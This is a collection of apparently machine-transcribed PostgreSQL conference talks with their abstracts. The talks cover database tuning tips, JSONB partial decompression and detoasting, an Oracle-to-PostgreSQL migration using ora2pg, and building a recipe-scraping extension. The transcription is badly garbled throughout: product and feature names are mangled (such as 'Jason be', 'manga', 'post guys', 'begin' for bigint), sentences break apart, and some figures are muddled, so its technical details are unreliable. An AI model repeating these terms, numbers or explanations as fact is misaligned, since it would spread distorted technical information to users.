your explained plan. You can see what the plan looks like. And when you roll back, nothing happened. This is what I call invisible indexes. And finally, when you need to schedule a long running process, it's only natural that you would pick around hour. Now, knowing that everybody else does the same, you can benefit from maybe scheduling long running processes at odd hours. Like instead of scheduling stuff at 2am, 2am, 4am, try to schedule something at 235 and 17 seconds. You have a better chance of finding a system at rest. And maybe your process will run slightly faster because of that. So this is it. I don't have any time left. You can check out my blog. I write a lot about performance and SQL and Postgres and Python web development as well. I'm pretty active on Twitter and you can subscribe to my mailing list. I try to send something around once a month. And you can also send me an email with your thoughts and corrections and whatever about the stock or anything else. So thank you very much for listening to me. And hopefully, you learned something new. Bye.
Databases are the backbone of most modern systems, and taking some time to understand how they work is a good investment for any developer! In this article I share some non-trivial tips about database development! Rules of thumb has been passed on from DBA to DBA for many years. Some of these rules may seem weird while others makes perfect sense. In this talk I present some of the "rules" I accumulated over the years, such as why you should always load sorted data into tables, how to make indexes invisible, and why you should always schedule long running processes in odd hours...
10.5446/53282 (DOI)
Hello. I am happy to talk at for them 2021 online conference on our post this meeting. And today I will talk about what to do to speed up the Jason be so the quick summary for those who are who is not as much time. Jason Jason be is very popular and is constantly developing. I refer here for to two recent talks about Jason be roadmap. The light of the latest was a post this build. You can download and see more background of this talk. And here that we need to improve the performance of Jason be. We want to investigate and optimize access to keys, metadata for non toasted and toasted Jason be. We consider. We want to optimize mostly very popular pattern of using Jason be impetus, and you have a comparatively small metadata and some big long keys. We want to optimize access to the metadata which is mostly often required. And we demonstrate step by step, how we could improve the performance of Jason be so we can leave, we can get significant speed up orders of magnitude. And this is our repositories for Jason be partial decompression and Jason be partial details. Also, you can download slides and video. This records contact our contacts. So if you want to collaborate with us. Help us in this project, you are welcome. So let's consider synthetic test to get some motivation for our work. In the station work. So table consists 100 Jason be different sizes from 100 bytes to 10 megabytes which compressed to 20 kilobytes. And here's how we have Jason's be looks like comparatively small method K1 K2 K4 and K5 in the middle. There's a very long K3, which changed its size, different size in the role. So the maximum is 10 megabytes, and we measure execution time or all operator for each role by repeating 100,000 times in the query, the query is this. So we, we measure not access time, read time, but just time of a row a row operator. So for this synthetic test, and we see from the left side and right side left is a master. And the right side is a, what we get the improvements, what master. So execution time versus row Jason besides and right is a, how many blocks read it by a row operator. So we see that we see the dash line. So 100 kilobytes is a limit for inline rows and slightly more than 100 kilobytes is a limit for compressed inline rows. And we see that we see the three areas. The first one is a area for inline inline rows, and we see that performance of for different keys and the same, because there is no decompression, you don't need to read additional blocks from toast. And the second is linear, a bit linear. So we see that this is also inline stored, but after compression. And the limit is 100, slightly more than 100 kilobytes. And then you see this toasted toasted rows. And the difference difference between performance execution time can be like a free waters of magnitude. So if you have a long, long keys, long json be access time can be very big, very big and blocks read, we see that for inline for inline rows for inline and compressing line. Inline and compressing line we see that blocks zero, because a row operator doesn't don't need to read additional blocks and for toasted. We see that we have we need to read much more blocks additional blocks. And show the results in a compressed axis, you see the compressed adjacent besides, then we see for blocks we have the same situation, but for performance we have looks a bit strange at first glance but actually this. We see that this part is actually inline stored compressed rows and performance decreases because of decompressing. So we need to decompress. And this is also the most important overhead is a decompression of the whole json be. So we consider real world example. So we took a database you can download it to play. And each Jason be looks like, like this. We have many rare fields, but only ID and I'm DB ID are mandatory roles is array is the biggest and most frequent. So, on slide you see the distribution of sizes of various keys. We have a Jason be we have compressed Jason be we see that some some couples are quite long about one megabytes. We have ID and roles, roles, height, and I'm DB ID. And this for keys where will be, we are interested for others are quite rare, and we will not test it. So, the results shown on this slide. We see the same as a synthetic test, but most, but not so what is a mixture of different, we are going run each query 1000 times. And here we see the distribution of execution time again for a operator. And we see that points are of different, different colors, just mixed. So, everything is slow, everything is fast, everything is moderate on the right size, you see the store size versus road Jason besides, and we see that we have red is in line storage. So it's as expected, and green is in line but compressed and blue is toasted. And we, from these results we see that the compression is the biggest problem in the overhead of the compression of the whole Jason be limits the applicability of Jason be as a document storage with partial access. And this is very important, because if you extra if you read document storage as a whole, you don't have such a bigger problem, but with partial access is limited. So we need to consider optimization like partial decompression toast introduces additional overhead. And this is the process needs to read too many blocks. So, additional, again, we need to optimize this and read only needed block. It's called partial details. Toast looks is a mechanism technique in progress to store to work with the long tuples, which not fitted to the two kilobytes. So toast compressed to pull and split it by chunks, which stored in different relations. So, when you access attributes attributes from this extended attributes, which is stored in toast, you have to do sort of join original table and hip to hip and toast table. And we understand that it needs. This is not maybe not very effective. And to access toast pointers, doesn't refer to the hip to pull in which chunks directly, because we need an index. We need to read for a, or even five additional blocks. This overhead of also overhead of toast access. So our plan to improve Jason be the toasting is falling. So first we consider partial PGS the compression. Then we order keys values in Jason be so short keys placed in the beginning and long keys at the end. Then we consider partial details using toast iterators. So read chunks by chunk as much as we need. And then the last one is in line toast in line toast when we store as much as possible. So we have a part of the first chunk in line. So, if we access attribute, which, which is, which can be fine in this part of first chunk. We don't need to toast at all. This is the last optimization we'll discuss today, and other is our ideas for future. So let's consider partial decompression partial decompression eliminates the overhead of decompression. And we need to read the whole Jason be on the left side. You see the full decompression to access key one and key five. The time is practically the same because you read who Jason be decompress and then do search and extract value on the right side partial decompression. So that key one access is much faster becomes much faster because we don't need to decompress the whole string, the whole Jason be, but to access key fire. And access time is still, still big, because you have to decompress along long key, long value three and four. Next. So, here is an example of results for the partial decompression. And the master and right is a partial decompression. PGS it. So we see that now picture lightly changed. We have K one and K two access to them significantly speed up. And you see, and for in line compressed Jason be access time constant as both. And for Jason be along just a bit. So, very long than one megabyte acceleration can be orders of no get you see. So, this is a bit. Yes, we have more than one order more than 100 times. So this is again area for in line compressed, and this is for toast, for those that will be. And we see that key one and K two. So red and orange points just jumped down from this linear from this line. And this is for partial decompression, but we still have K five and K four still slow. They are here with very long key three. So, to eliminate this. This is the same optimization we use for indb data with data set the. And the results more or less the same for synthetic. Yes, but, but it looks more, I would say, more beautiful, more beautiful, but actually results are the same so access time to the first K ID and recede height. So, it's a blue and yellow was becomes much faster, much slow, much low. And for the big roles roles is a green and short indb which which is placed after roles. Mostly unchanged to see that the same here. The idea and roles, they actually speed up. We got another idea is sort Jason the keys by by length of their value, you know that in a regional Jason the format object keys sorted by length and name. So, in this case with longer or alphabetical greater names are placed at the end. And there is no, no way to benefit from the partial decompression. What what if we sort by value lamps, then we get fast compression for the shortest key. V five becomes at the beginning and the V three becomes in the end so see that this original key names and value sorted by key names by length. So, this is the original sorting. And here is a new sorting. You see that V five, V, K five and K five, K four and K five placed before K three. That means that you don't. We don't need to decompress to decompress all the whole Jason be. And we see that access to the all short keys, excluding K three, which is now, and at the end of Jason be what significantly speed up. We see that on this on the right side, only green points remains here. All other points just shifted down. The result is also the same and access to the ID ID red, which is a last, last becomes much faster. So we see only only green here only roles, which is big attribute, big key. So we use what if we to optimize hosting. So, we need to read only needed chunks. So we used the hosting iterator from commit yes it was developed developed by Google Sock students two years ago. And it provides ability to decompress chunk by chunk. So, for example, if we need only Jason be header and first keys from the first chunk, only this first chunk, we will be read. And then we provide it patched to ability to decompress only needed prefix of the toss chunk. So, for the synthetic test we see that situation also improved. And because we see this is this becomes like this. So, access to the, to the short keys become almost dependent on Jason be size. This is the result for partial the toasting for IMDB. We see the same picture. So, big gap in access time, almost five times. It's between in line and toss it will use still here still exist. So we need to optimize it. So if we can consider how many blocks are needed by error operator. Then we see that we have access to the short keys requires only for blocks for blocks. Three index blocks and one hip blocks. He means toast table. And only green points remains. And the previous optimise previous step, we see that colors are mixed. But with partial the toast, we read only short keys for to access short keys we need only the constant for blocks. That's also good optimization. And then we decided, what if we store chunk, the content of the first chunk, as much as possible to fit in the in line in line. So, we developed a new types, new storage, we call it provisional name tapas, which works similarly to extended storage, except that we try to store content part of first chunk in line. And give us the latest optimization for today. And here is the result for synthetic storage. We see that situation for short keys, greatly improved. So there is no gap in access time to short case long and mid size json be you see. So that long rules key remains the same, the performance because what to do, this is a long key. But what's important that short case we get much very fast. You see that it's almost three orders of my idiot. So for IMDB, we also see the same, the same results as a previous synthetic test, and there is some access time gap here between compressed and non compressed json be this way, probably, we will investigate this and probably we will improve the situation. Here is a blocks read it by a rotator. Now, all these points shifted down. So, no blocks additional blocks to very good optimization. And here's a step by step results for the test. We started from master situation from master. So, we have a short case partial detour and in line toast. And we see how results are changed. So, for this points, for this points, we improve situation several orders of magnitude. Long green remains unchanged. For IMDB, we have slightly different results but more or less the same. We see that roles green remains unchanged, but short case short case we have a game to orders of magnitude for the long case we can, we can have a very big improvement. And so conclusion is that some simple and straightforward algorithms and storage optimization, we greatly speed up access to the short case of Jason be. The same technique we can use for data types for any data types with random access to part of data for example for arrays to forest each store. You can imagine data type PDF with header contains offsets of the separate of specific of pages of pages. And store PDF inside Jason be and access different pages directly using. Yes, but I just remind that we consider optimization of popular patterns of using Jason be some short keys on long, some longer. So, we optimize access to the short keys. So now, access time, mostly not dependent on the where these keys placed in the Jason be at the beginning in the end. Our optimization made it adaptive, adaptive Jason be so. We want to work on further optimization, we want to introduce a random access source. So we can read only require to us to us chunk to speed up access to the midsize keys. For example, if Jason be contains 100 fields in each of them is one kilobyte size. So how to get the parts of the, of the, of the value. And also we can think about toast cash to avoid the duplication of the toasting for if query query we have several Jason be operators and functions, which use, which use the same Jason be attribute. So we save the results of the first the toast. Another mission is, for example, deferring the toasting. If we're in the chain of accessor example, we don't need the toast the whole roles. We just wait and the toast only part of this rose. We have, we made some known very non scientific comparison comparison of progress with manga, the latest manga for 4.09. And we just checked the access to the rare attribute height. So we asked how many six inch tall people can be find in the IMDB database. And the answer is in parenthesis is more than 10,000 people. And we just sequential scan the database in memory. So in polis size shared buffers is 16 gigabytes and manga by default on is a 22 gigabytes. And we see that how different optimization help, pause this help pose this actually becomes faster, faster than manga. And in line tools help already made for this faster. But if we include parallel execution. I reminded all test we we disabled parallel parallel features of produce. Then we see that pose is actually becomes much much faster than manga. But again, I say that this is very non scientific comparison. More details and results will be available at PG conf online 2021, which will be held in mark in the beginning of March, here's a links to the conference please register. And you're welcome with your questions, even your suggestion, we will provide the big detailed technical talk about optimization, maybe we can add more optimization like random tools access. And here's an example of our idea about random access. So we first we slice Jason, and then we compress original toast compress top then slice that made us as impossible. We slice and then compress and store it and add additional field chunk offset. Then it could be possible to from header to know which chunk we need to read. So but this is just idea, wait for several wait for beginning of March, and probably we can show this optimization. And that is was my last slide, all you need to suppose this. And thank you for attending.
Jsonb is popular data type in postgres and there is demand from users to improve its performance. In particular, we want to optimise a typical pattern of using jsonb as a storage for relatively short metadata and big blobs, which is currently highly inefficient. We will discuss several approaches to improve jsonb and present results of experiments.
10.5446/53283 (DOI)
you Hello everyone and welcome to our talk about the migration. My name is Alica Pucharczyk. I'm EMEA Global Black Belt Oasis Data Tech, especially at Microsoft and together with my colleague, Sushant Pandey from SQL Ninja team, we conducted a successful migration from Oracle Postgres for one of our customers. That is the story that we would like to tell you a bit about. Starting that was the migration from Oracle Exadata system. The target database was Azure Database for Postgres, which is pass service which you can find on Azure. The target version of Postgres was 11. As you can see, there's been a similar, not exactly the same configuration of the source and target database. Both instances had four v-cores. On Postgres, we had 16 gigabytes of RAM on Oracle 32 of them. The scope of the POC was only two packages out of really many of them. That was like huge system loaded with the logic. The customer choose two packages, which were the most complicated to showcase if Postgres will handle it well. Besides of two packages, we also migrated some single objects and some schemas. Tables from another schemas that were dependent. For instance, we migrated also the whole package for logging, because our packages was using that. Success criteria, that was basically the performance. The main aim of this POC was to check if the Postgres can at least be so performant as Oracle Exadata was. The test we run were based on a custom script written by the customer, which was going through those packages and trying the procedures inside of packages with the different values. The main tool that we used for this migration, it's probably the most famous and the most widely used tool for Oracle to Postgres migration or R2PG, which created a framework for the migration. Maybe not all the procedures, not the whole staff was migrated automatically, but a lot of that and the rest required some manual effort and some optimization. First, we want to show you the results. Sushant, over to you. Thank you, Alicia. I hope you can hear me okay. All right, so let's talk about the results. The results were taken in three different parts actually. The first one and the second one and the third one, the test cases or the test sets which we saw was, we had node 1 which was execution 1 and then duration and node 2 duration and so on. For the test 1, which was for one of the function which was using the tree traversal kind of mechanism for the hierarchical queries and the output. As you can see for the node 1, 2 the Oracle performance was quite good compared to the Postgres SQL. In the node 7 also, what we saw overall for the test 1 was that Oracle performance was quite good and the Postgres performance was about 12.5 percent of the Oracle. So we were quite behind in this piece. However, this is not the end of the story. We had some good news when we actually conducted other tests. So in the test 2, which we call it as cursor free execution. So this was for one of the function where we did not use any type of cursors, but whereas the original Oracle function was actually using multiple cursors there. So we converted that code and try to use the set-based queries. As you can see for the node 1, 2, 10, we had got far better performance in the Postgres compared to Oracle. So this you see, it is about 873 percent better compared to Oracle. So this was one function where we received far better performance. There was another function or the test scenario, which we executed. It was again for the cursor free execution, but here we had one interesting scenario which we came across, which we will talk about in detail a little later. In this particular execution or test, we performed for two nodes and the node means two different executions with different values. Here you also see better performance overall compared to Oracle in Postgres. It is about 117 percent of Oracle. So we were better in Postgres SQL. So these were the test results. Now I am handing over to Alicia to talk about two code migrations that we did. Yeah, over to Alicia. Thank you, Sushant. So we don't have time to talk about each particular part of this migration because we've got only 30 minutes, but we've just chosen some most important one in our opinion. So let me start from sys-connect by path code clause that is present in Oracle, but in Postgres we do not have the same clause. We don't have this statement. And the common way of migrating that to Postgres is by using with recursive, which is probably one of the slowest queries that you can have in your Postgres instance. So we tried to avoid those kind of queries where possible, of course, because there is not possible in each case to get rid of the sweet recursive. Sometimes it's really necessary. So sys-connect by path, as you see, it's used in hierarchical queries. So it's just returning the whole path of a column value from root to node. And you can choose the custom separator of those values. So it's kind of when you've got ID and parent ID scenario, and you are traversing to the tree. So that's a code as snippet from Oracle. It's only a really small part of the whole procedure, of course, anonymized. And as you see here, there is sys-connect by path used with the comma. And then there is like window function used. And the whole execution took 45 milliseconds. And as you see here, because there is like a DBMS output statement, so you see that this particular snippet is producing just the ordered list of the numbers. So pretty simple thing. In order to PG, beside of export scripts that I commonly use, and I always use this export script when I do start the migration, you can also use the conversion of particular objects. So procedure type or just a query to Postgres. And as you see, I just put it like this Oracle snippet to the file and told Oracle to PG that this is a procedure, and that is the output that Oracle PG produced. Those parts that are highlighted in red that you may or might not see, we've recoursing twice, beginning in two streaks, like in the second part of the union. Also the table statement, those are like pretty much the bugs, right? That will not work on Postgres. So even if Oracle PG in this case helps you to get some kind of like the framework, the template of the migration, you would need to put some manual work to make it work, like get rid of this double begging statement, get rid of this table after a firm, because it doesn't exist, the syntax in Postgres, and also as you see, double semicolon. And even if you do put this additional work to this particular procedure, that will not be super performant on the Postgres site anyways. Because like we recourse it's really kind of a very slow query. So the thing that we did, it was like just totally rewrite that, like to keep the logic, so like if you've got the set of the input parameters, it should produce the same output parameter as in Oracle. But as you see that the statement were totally changed. And that is something that we consider as really good practice. So instead of writing your own functions trying to reinvent the wheel, so first a shot should be like to try find the native Postgres functions that you can use. And use it instead of custom written ones. So we have used like unnest, which is like native Postgres function, and just order it by here and then use a string, a KGF function, which is a simple string aggregation, and that was actually it. As you see also, like we haven't created like the additional data type, we just used a array of numerics for that. Could be integer by the way. And as you see, the execution time was just a three milliseconds. So instead of with recursive and complicated code, yeah, we just used unnest function and string aggregation, and we had like one order of magnitude, a faster execution on the Postgres site. Okay, the second example I would like to show you, it was like loaded with bulk collect cursor and for loops, so nested loops. A bulk collect for those of you that are not Oracle DPAs, this is the clause that does some operation in bulk. So instead of like going through one row and then like looping through single rows, it's just doing some operation like on set of the rows at one time. And we don't have bulk collect clause in Postgres also. That's the snippet from the Oracle. As you see the first here, it's the cursor which was used. Then we opening the cursor at the beginning, fetching it to the bulk collect. Then we've got the first loop and then goes like the second loop, which is reverse loop. And then we aggregate the string. So in this simple and really short snippet, you see cursor to for loops and bulk collect. It's really not an easy one for migration to Postgres. Again, if you do migrate the snippet with orator.pg, what you will see that orator.pg does not handle bulk collect at all. So it doesn't even like try to convert it. It's just leaving bulk collect as it is. And obviously that will not work on Postgres. And actually the code is pretty much unchanged. So what we did again, it was totally rewriting the whole procedure. First thing that we also did in other procedures was we took the cursor outside of the function. Because it was quite commonly used cursor. It was used in many other procedures. So instead of putting the same cursor over and over again, we created a SQL function. Yeah, that's important. It's not PLPG SQL function, but it's SQL function. And we just put it here. Then as you see, that's completely different kind of statements. So we don't have bulk collect. And one of the way to migrate those is to create temporary cable. Because in bulk collect, if you do have that in Oracle, you can do for instance count of bulk collect. You can fetch like particular rows. You can do a lot of operation. In Postgres, you can just traverse through the results, but you don't have that many options. So a temporary table does give you those kind of options. If you've got even bigger data set, you can put indexes on this table to make it more performant. And you can do a lot of stuff with that. So as you see, the first what we did was we run this function. Which is the old cursor. Then we saved those results as temporary table. And also deleted all the rows where row number was one. Why? Because yeah, that doesn't, this is not obvious, but if you go back to the Oracle snippet, then you will see that the last loop, it's reverse loop. So it's kind of like starting, it's like, yeah, it's like starting with two, there is no one. So the Postgres way, the temporary way, the temporary table way of migrating that would be, for instance, just deleting those rows. And that you see analyzed because Postgres doesn't run auto vacuum on temporary tables. And then we've got just one loop instead of nested loops. And using again a string, a giga function to put like the results together. So if you would take a look at both sides, it looks like totally different procedure, right? And basically it's producing exactly the same result. Sometimes it's not possible to migrate in the same way as it is. Sometimes you need just to understand first what is happening inside of your procedure and try to choose the statement, the way of doing stuff like in totally different way because we need to remember it's that completely different engine anyway. So as you see here, we also achieved with this rewrite much better performance as in Oracle, so 14 milliseconds versus 41 milliseconds. OK, the next example, Sushant, is takeover. Yeah, Alisha, thank you. OK. So this snippet that you see here is conversion of Oracle function into Postgres. The uniqueness of this function was that it was using a lot of table functions which are native to Oracle. They were using the dynamic queries and they were using the ref cursor as the output type of the function or the procedure we can say. Now what we did is actually we converted that into the written type as set of records instead of ref cursor. We actually compared both of them in the Postgres SQL and found that the set of record performed far better compared to the ref cursor. For those who can actually identify these yellow colors, I am trying to highlight that inside the dynamic query, we were using unnest function which was to open the arrays which were passed as the dynamic parameters to this particular query. And the result set of this dynamic query was actually written as the set of records to the calling function. There is another yellow section at the bottom side which is talking about how do we return the set of records using the dynamic queries from a Postgres function. The execution time which we saw here was 31 millisecond and this is in comparison to Oracle of about 28 seconds. So we saw that set of records was the better choice compared to ref cursor in our case. Now moving ahead, this is the piece which I spoke about in the third test result which we saw. This is the specific scenario where we saw that data type mapping of the fields which are joining to each other to get the results can be of a bit problematic if they are not same. How did we realize is we had a query which is given on the left and top corner side where we are joining. So I tried to highlight that in yellow and if people are not able to identify that yellow, I'm talking about the first join which is on table D and table E. This was the join which was happening. So the table E column was of numeric type and the table D column was of begin type. Now on the right hand side, you can see there are two comparisons. This is actually done after we identify the problematic situation. So the middle section of this screen tells you about the execution plan. And in this execution plan, the red highlighted section is something I'm talking about where the column of table D is getting typecasted to numeric to match its type with the type of column E which was numeric earlier. Now because of this change, we were, or this typecast, actually, we were seeing the performance like it was, the function was taking somewhere close to nine seconds. When we actually converted this numeric type column to begin and then executed the query, we got super fast performance. As you could see in the bottom image of the slide, I tried to highlight that in yellow. But if you are not able to see that, there is a section which says it is the index scan happening now because there was a scan on table D which was not getting used when we were having different data types. When we had the same data type, this index was used and we got the desired performance. And it was 31 milliseconds. And this was better than compared to Oracle in the actual results. So this was one of our experience. Yeah, based on our experience of this whole work, what we saw is there are actually some generic rules that we could probably follow. We are not saying that every time you will get the performance better than Oracle, but in our scenario, most of the times, we beat the Oracle. So some generic rules that you can probably follow is for the nested loops, try to reduce the looping in when you are actually converting the code and put some kind of improvements, as Alicia also mentioned in her examples of Oracle, as well as post-credits conversion. Then if we have some kind of dynamic queries, we can actually try to improve the dynamic queries and make them more performant. Actually, we were able to do that after changing some logics. We were able to get the performance by reducing some of the for loops and so on. Then there are ref curses. So we compared the ref cursor execution with the set of records as the output type. And we actually found that set of record was giving us the better results. So this was one piece. Then this was about a whole story that we actually worked on for one of our customers. Now, if you want to go ahead and find out more about the Azure Database for PostgreSQL, there are a few links which you can go and have a look at the information available. There are some blogs from Microsoft site on PostgreSQL. And there are a few documents which are available, and migration tutorials are available as well. Then if you have some more information that you need, there is one version which is called Citus, which is open source. You can go ahead and read about it in aka.ms. If you have further questions about the Azure Database for PostgreSQL, you can reach out to us on the given email address. Yep, so that is it from our side. And you can see Alisa has again converted back to the PostgreSQL elephant. So that's all from our side. Thank you, folks. Thank you, everyone, for listening to us. And the forum is now open for the question and answers. So please go ahead and ask your questions. We are here to answer them if possible. Otherwise, we can actually be contacted over the email addresses. And later on, we can share our thoughts. Thank you so much. OK, we are online. Thanks, Alisa, for the talk. So we have several questions, and probably you answered on many of them. So how do you feel about migrating from Oracle to PostgreSQL? Really great, and really great, especially when we can prove that PostgreSQL could be much, much more performant than Oracle. People usually don't believe that's possible. And then you just start showing the numbers, OK, here we are much better than Oracle Exadata. Here we are also much better than Oracle Exadata. And yeah, PostgreSQL works. So from what I see, the main problems were with the function and procedures code itself. What do you think? Is it possible to automate that migration somehow using artificial intelligence or maybe some other techniques? Yeah.
In this talk we want to present how Microsoft team composed of people from two different teams approached the project and solved the migration issues using ora2pg and was able to prove that Postgres Single Server can perform equally well as Oracle Exadata. We will present our ways of working and also some main technical challenges that we faced including migration of BULK COLLECT’s, hierarchical queries, refcursors and others more complicated Oracle constructs. The story about a challenging PoC that proved that Postgres can achieve the same performance as Oracle Exadata. The schema that was migrated wasn’t the simplest one you might see. It was quite the opposite. The code was loaded with dynamic queries, BULK COLLECT’s, nested loops, CONNECT BY statements, global variables and lot of dependencies. Ora2pg did a great job converting the schema but left a lot of work to do manually. Also estimates produced by the tool were highly inaccurate since the logic required not the migration but total re-architecture of the code. In this talk we want to present how Microsoft team composed of people from two different teams approached the project and solved the migration issues using ora2pg and was able to prove that Postgres Single Server can perform equally well as Oracle Exadata. We will present our ways of working and also some main technical challenges that we faced including: • How estimates do (not) work • How we handled BULK COLLECT’s • Why we got rid of refcursors • How we got stuck with testing of one the packages and how the help from a friend solved the problem • How we handled hierarchical queries and drilling down the hierarchy.
10.5446/53285 (DOI)
Hello. Welcome into post guys here in the room and welcome to this post guys here. You see that I'm not at my desk. I'm in my kitchen because I will be baking waffles while delivering a comfort talk about post guys extension and using a practical example of an extension I created specially for you post guys waffles. My name is leticia of all, I'm a senior database consultant for Edb. I've been working with post guys since 2007 so I have a little experience with it. I'm involved in the community. I've been a post west code of conduct committee member, and I'm also post guys women cofender, and I'm post guys here in Europe through the room. If you've already seen one of my comfort talk, you might know that I like very clean and pure slides with most of it only images and the text. Whatever reason you did more text, go to my dv in the group that are there you will find a comfort talk tab, and you will have a direct link to the annotate slide deck that will help you to follow this contour. You can follow me on Twitter under art L underscore of rule and if you'd like to bake waffles with me at the same during this comforter go into your kitchen, you just need some floor, some sugar, some butter and some eggs. And that's all. So why waffles. It's for them, but we won't be at recess. It's for them, but we won't meet our community friends, and we won't be able to have beers and waffles at two. That's very sad to cheer up and to cheer myself up. I decided to bake waffles just to make for them spirit leave a little more. So, to answer this call talk, I will explain what is an extension and how you can create one. I will use a practical example of a custom made extension, which is called post was waffles. This extension only goal will be to display a warfare recipe in post rest. You will see that's very simple. So, what is an extension. An extension is a package to hold several database objects. What is the object. It's very wide. It can be schemas views, materials, use tables functions, procedures, or whatever you want. And of course, you're always allowed to create this. The subjects, without using an extension. So the next question you can ask yourself is, why would I need an extension an exception for my database is objects. And then I can be found on post residential documentation. So, for example, extension to pose rescue, I typically includes multiple multiple as well objects. For example, a new data type will be a new functions new partners and probably new index of the classes. So it's very helpful to collect all these objects into a single package to simply to simplify database management. So simply, you just want to simplify your database management. So, when did we created post rest extension how it happened and so on. And this first thing I can say is, it's very old, as old as may 1986. So, even some of you might not have been born at that time. I was, but I was not of age of reading. Dr. Stonebrocker or Professor role design of postgres not. But what you can see is the main goal inside the design of post waste. This was the second goal of post waste to allow new data types new operators new access metal and more of it. This should be implementable by nine experts. And it's easy to use interfaces. That was already in Dr. Stonebrocker sorts when he designed post rest. And then what happened. And we need to jump to 2005 where Fabian Coelho and a guy named Peter and I'm so sorry I was not able to find his name and created a make five framework to help designing extensions. And I think that extensions is great but how can you advertise about your extension. How can people know this extension exists and can be very useful in production. That's why David Wheeler created PG XN postgres extension network, so that you can look for extensions and find them very easy. And Dimitri Fata from 10 with some help from company created the very useful statement create alter drop extension so that you can create your extension using a single SQL statement. The next step was in 2016 when Pertrognet added an option cascade to the create statement so that you can create an extension that will by cascading create another extension. I use that once when I was creating an extension to be able to use a foreign data wrapper. So if you still don't get what an extension is. I bet that you already use extensions inside your postgres. So the first one I will give as an example is the one we always forget because it's so huge we forget it's a postgres extension, but guess it's meant to deal with geographical data. So that's the university, Libre de Bruxelles, they created an extension called mobility DB that is based on postgres and postgres to make geographical data easier. And on your production system you might find something like PgState statements. This extension is very, very handy when you need to gather performance statistics when you want to know how your query perform, which one you need to make better and so on. That's very, very, very useful. The one you can find useful for performance purpose is auto explain, which will log into postgres log file, explanation plain for slow queries. That's very useful, but it can harm your performance by doing so, so use it with some care. And auto help you encrypt your data so you can find that very useful. PgPrem is a little less use now, it helps load your data into either the OS cache or postgres prefer cache. So that can speed up your queries when postgres is starting. Then you might have heard about Citus. Citus is a very useful extension that helps you horizontally charge your database. That's very, very helpful when you have a very huge database. Well, just remember that when I have a customer with a very huge database, my first question is, are you sure you need all this data? Just keep that in mind. Then if you're French like me, you might find useful to have an an accent extension so that you can full text search from some text without accenting letters. That's very, very useful. I love the idea of somebody be where you can query an elastic search index on top of postgres. And then maybe you've heard about foreign data wrappers. Foreign data wrappers are meant to ideally help you deal with any data source can be anything you can take off from a flat file to a Norco database, any other database, any other kind of IT thing where you can store data. Each foreign data wrapper is an extension. So you might need to install all those one by one. But what we want is waffles. So the first thing you need to know before anything is that we will go into the whole recipes website. We will look for a warfors recipe and we will sort them by ratings, assuming that the best ranking will show the best warfors recipe. That's not for sure we know how it works with internet but let's assume it's a case here. And after that, we will look for the first link, we will then go into that new way page and we will look for the ingredients and steps needed for this recipe. We will store everything inside a version of the demo and then we will display the recipe. Very simple. So what is the recipe to create a buzzword extension. The first one is the technically simplest one, but maybe the most complex one, you will need to find a great name. So we, you will need to look at is that name already taken and things like that. The second one is the fun part where you play with source. The third part is where you will create your extension with a Mac file and a control file. And the fourth part is when you will test your extension using create extension. After that, you will be able to reduce your extension on the post-waste extension network. The first one was finding a great name. As I said, you might need to look for a name that is not already taken. That's the first one. But it's not all. You won't be able to use an extension name with a hyphen in it. That's very important. It's forbidden in post-waste to have hyphens in identifiers. Just as post-waste, you can use dollars inside your name, your identifiers, but that's not a serial compliance. I decided to go with the simplest with PGWaffles. I would like my name to be not too long because I know that by deflamping my extension, I will have to type that name a lot of times. So that's why I decided to go with something short. But I wanted something meaningful. That's why I go with PGWaffles. Let's go into the fmpath source code. Maybe you're asking yourself how we will be able to pass HTML files with post-waste. Well, that's quite simple. I created a temporary table. It's easy to use. On top of that, when you remove your sessions, they will be automatically dropped. But you don't have to care about that. This table will have only one column called HTML where you will find the HTML source code of the search in all recipes. So how will I have this source code inside post-waste? First, I tried to pass HTML using post-waste and that was not easy. I decided to rely on the wonderful W3C set of tools using HXNormalize to normalize the source code and HXSelect to select only one tag with a tag selector that is the exact same thing you use when you use CSS. So I decided to use the new line because I wanted everything in one row because you don't know where the new line happened. So the data source code, new new lines could happen inside a HTML tag. That would not be good for post-waste. So I used TR to get rid of the backslash N meaning a new line. After that, I was able to select from my temporary table all recipes and I had all my links from the first one, meaning the best rankings, to the last one. Well, only the top 20 because there is a pagination on the results of the search. But I only need the first one, so I'm fine. Now I need to use SQL to be able to get the green part URL1. How can I do that? So here, just for your mind, here is the kind of data I have inside my table. And here is how I will get it. So the first thing is the with list elements. With list element can be called also commentable expression or CTE. You might have encountered them before. So if you use Rogalps split to table, it's a function, a text function already integrated inside post-waste that will take a text, use another text as a separator and give you all the results in separate roles. So we have one role per URL with some stuff at the end that I don't want, because I will have things like that. And I will have to use the split part of my URL that I don't want. That's why after that I have to use split part here to get rid of anything after that. So the split part function is also already integrated inside post-waste and it will split a text using a separator and then it will give you the part you asked for. As it's SQL, everybody's begin with one, so I use one because I wanted the first part, that one. And then I just used a symbol, where close here just to get rid of the first part here that I did not want. There was some things here that I did not want. I just wanted that URL. So I have all my URLs, but I want only the first one. So now I will go into that HTML source code and look at how I will be able to retrieve ingredients and steps from that. First surprise, when you open the page, there is a NASKEY text unicorn as HTML command at the beginning of the web page. That's very nice and I once said that the slide deck is not perfect. It says if there is no unicorn in it. So this one was easy to find. So after that, I went down and I found out that everything I needed was already stored in a JSON-like text inside a tag named script. So I thought I could maybe isolate that tag, isolate that JSON, and I will pass the JSON instead of passing HTML source code that will be more easy to do with plus ways. So that's what I did. But first, I needed to create a new temporary table. So my table will be called processed recipe. I will have a data column, which is text and will be some kind of things around my JSON. And after that, I will be able to isolate my JSON and to store it on the recipe column of that type JSONB. I choose JSONB for performance reasons because JSONB performs better than JSON, even though I will have only one recipe in my table. But who knows, maybe one day you will have more than 1000 wolfers recipe and you'll be very happy to have JSONB instead of JSON. Then I used a title column and I use it as a generated column. I don't know if you already know about generated columns. It's a very, very useful feature in plus ways that allow you to have data generated on top of other columns. First, what I wanted was my JSONB column, the recipe column, to be generated out of the data column. But I found out that you are not able to generate a column on top of another generated column. So I had to restrain myself and say, okay, I will first have the data column and then I will update the data column to get the recipe column. And on top of that, I will use generated columns to get any information that needs. So the title, I found out that it was stored inside the JSON as the, with, inside the key name. So I just had to either accept key and you say that I use a raw operator that you can use with JSON. Then I will have all those other columns like I made descriptions, yields, and so on. So everything you need for recipe, ingredients, steps, I will add a key words, which is a text array, just in case that I want my extension available to store other recipes than warfare's recipe. So you might want to search for beef stew, and then you will be able to store that in the same table. And you just don't want to mix a beef stew recipe with warfare's recipe. And then I will store the rating as double precision. I could have used a number, but precision is not very important here so I can use a double. So I will use the exact same trick to get to my time with a HX select tool, my tag is script with a type 